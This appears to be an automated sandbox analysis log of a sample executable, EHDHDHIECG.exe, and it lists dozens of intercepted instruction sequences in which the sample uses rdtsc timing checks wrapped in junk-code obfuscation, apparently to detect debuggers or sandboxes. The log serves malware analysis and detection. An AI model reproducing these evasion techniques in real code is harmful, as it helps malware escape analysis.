Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8F36E3 second address: 8F372A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FEE851EFD86h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FEE851EFD95h 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007FEE851EFD8Ch 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jo 00007FEE851EFD98h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8F372A second address: 8F372E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FAF89 second address: 8FAF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FAF8D second address: 8FAF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FAF9A second address: 8FAFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB0BE second address: 8FB0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB0C2 second address: 8FB0D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FEE851EFD86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB0D2 second address: 8FB0FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FEE84E88FC8h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB645 second address: 8FB649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB649 second address: 8FB654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC04F second address: 8FC082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007FEE851EFD90h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC082 second address: 8FC112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FEE84E88FC6h 0x00000009 je 00007FEE84E88FC6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FEE84E88FCBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e jnc 00007FEE84E88FD3h 0x00000024 jmp 00007FEE84E88FCDh 0x00000029 jmp 00007FEE84E88FD9h 0x0000002e popad 0x0000002f pop eax 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FEE84E88FC8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a mov esi, ebx 0x0000004c call 00007FEE84E88FC9h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FEE84E88FCDh 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC112 second address: 8FC118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC118 second address: 8FC159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b je 00007FEE84E88FCCh 0x00000011 ja 00007FEE84E88FC6h 0x00000017 push ebx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007FEE84E88FD5h 0x00000025 mov eax, dword ptr [eax] 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC715 second address: 8FC71F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FC71F second address: 8FC723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCC80 second address: 8FCC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCC84 second address: 8FCC8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCC8A second address: 8FCC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCDDB second address: 8FCDEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCDEA second address: 8FCDEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCF73 second address: 8FCF9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jns 00007FEE84E88FC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007FEE84E88FD8h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCF9E second address: 8FCFA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FCFA3 second address: 8FCFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD126 second address: 8FD134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD134 second address: 8FD138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD138 second address: 8FD13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD13E second address: 8FD143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD19A second address: 8FD19E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD19E second address: 8FD1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD1A4 second address: 8FD1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD299 second address: 8FD2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD2AC second address: 8FD2E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FEE851EFD86h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FEE851EFD88h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov di, ax 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FD2E3 second address: 8FD2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FE120 second address: 8FE126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901D92 second address: 901DAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FEE84E88FC6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901DAB second address: 901DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov esi, dword ptr [ebp+122D29BDh] 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1A06h], esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FEE851EFD88h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push ebx 0x0000003b pop ebx 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901DFE second address: 901E08 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901E08 second address: 901E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902A0C second address: 902A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007FEE84E88FDCh 0x00000012 jmp 00007FEE84E88FD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEE84E88FD6h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902A5F second address: 902ACC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FEE851EFD88h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FEE851EFD88h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e mov esi, ebx 0x00000040 push 00000000h 0x00000042 mov esi, dword ptr [ebp+122D2E36h] 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FEE851EFD8Fh 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902ACC second address: 902AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEE84E88FD7h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902AF1 second address: 902AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 901B09 second address: 901B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 902AF5 second address: 902AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9027BE second address: 9027C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90450A second address: 90450E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90450E second address: 904521 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904521 second address: 90453E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEE851EFD92h 0x0000000c jp 00007FEE851EFD86h 0x00000012 jc 00007FEE851EFD86h 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90453E second address: 904551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEE84E88FC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FEE84E88FC6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904551 second address: 904557 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904557 second address: 904570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 jmp 00007FEE84E88FCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9031E0 second address: 903220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEE851EFD86h 0x0000000a popad 0x0000000b jmp 00007FEE851EFD98h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEE851EFD99h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 904570 second address: 904591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD5h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90B913 second address: 90B918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90A8FE second address: 90A91E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE84E88FD8h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90A91E second address: 90A922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90A922 second address: 90A98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FEE84E88FC8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+1248E95Bh], ebx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov dword ptr [ebp+122D1B8Ah], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push ebx 0x0000003f mov edi, dword ptr [ebp+122D28C0h] 0x00000045 pop edi 0x00000046 mov eax, dword ptr [ebp+122D0D75h] 0x0000004c mov dword ptr [ebp+1245B9B6h], ebx 0x00000052 push FFFFFFFFh 0x00000054 clc 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FEE84E88FCAh 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90FBC6 second address: 90FBD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FEE851EFD8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 910B1D second address: 910B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEE84E88FC6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90DB1B second address: 90DB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90FD75 second address: 90FD7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90EC60 second address: 90ED1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FEE851EFD88h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D19F3h], eax 0x0000002d jnp 00007FEE851EFD89h 0x00000033 push dword ptr fs:[00000000h] 0x0000003a jbe 00007FEE851EFD9Bh 0x00000040 jmp 00007FEE851EFD95h 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c movsx ebx, dx 0x0000004f mov eax, dword ptr [ebp+122D16BDh] 0x00000055 sub bx, 896Bh 0x0000005a mov ebx, dword ptr [ebp+122D29C1h] 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push ebx 0x00000065 call 00007FEE851EFD88h 0x0000006a pop ebx 0x0000006b mov dword ptr [esp+04h], ebx 0x0000006f add dword ptr [esp+04h], 00000016h 0x00000077 inc ebx 0x00000078 push ebx 0x00000079 ret 0x0000007a pop ebx 0x0000007b ret 0x0000007c mov edi, dword ptr [ebp+12463175h] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FEE851EFD97h 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90ED1E second address: 90ED25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90FD7A second address: 90FDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE851EFD8Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FEE851EFD91h 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D2A55h] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov bh, 1Ch 0x00000029 mov eax, dword ptr [ebp+122D10C5h] 0x0000002f jmp 00007FEE851EFD97h 0x00000034 push FFFFFFFFh 0x00000036 sbb ebx, 744DD2E3h 0x0000003c nop 0x0000003d pushad 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 popad 0x00000044 jnc 00007FEE851EFD8Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90ED25 second address: 90ED32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90ED32 second address: 90ED3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911AA3 second address: 911AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911AA8 second address: 911AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEE851EFD99h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 912885 second address: 9128AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 movzx edi, cx 0x0000000b push 00000000h 0x0000000d pushad 0x0000000e mov al, 0Dh 0x00000010 mov dh, 29h 0x00000012 popad 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2D3Ah], edi 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FEE84E88FCCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9128AB second address: 9128AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 91371E second address: 913739 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEE84E88FCDh 0x00000013 rdtsc
